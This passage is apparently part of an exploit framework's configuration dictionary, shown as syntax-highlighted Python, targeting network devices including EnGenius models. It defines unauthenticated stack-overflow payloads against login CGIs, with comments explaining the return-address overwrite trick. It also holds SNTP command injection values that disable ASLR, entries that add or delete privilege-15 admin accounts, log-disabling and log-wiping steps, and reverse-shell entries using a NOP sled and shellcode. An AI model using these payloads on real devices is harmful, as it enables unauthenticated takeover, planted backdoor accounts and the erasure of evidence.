					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>					<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=+&amp;cursntpPort=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'EnGenius'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'EnGenius Technologies, Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/loginMsg.js'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'security.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">280</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'datajson.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn_httpupload.cgi?'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># &lt;================================</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># It is vulnerable, but I am not using this authenticated code here :&gt;</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token comment"># Bonus: Disable and clean logs</span>
					<span class="token comment">#</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;en=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=0'</span><span class="token punctuation">,</span>					<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=1'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
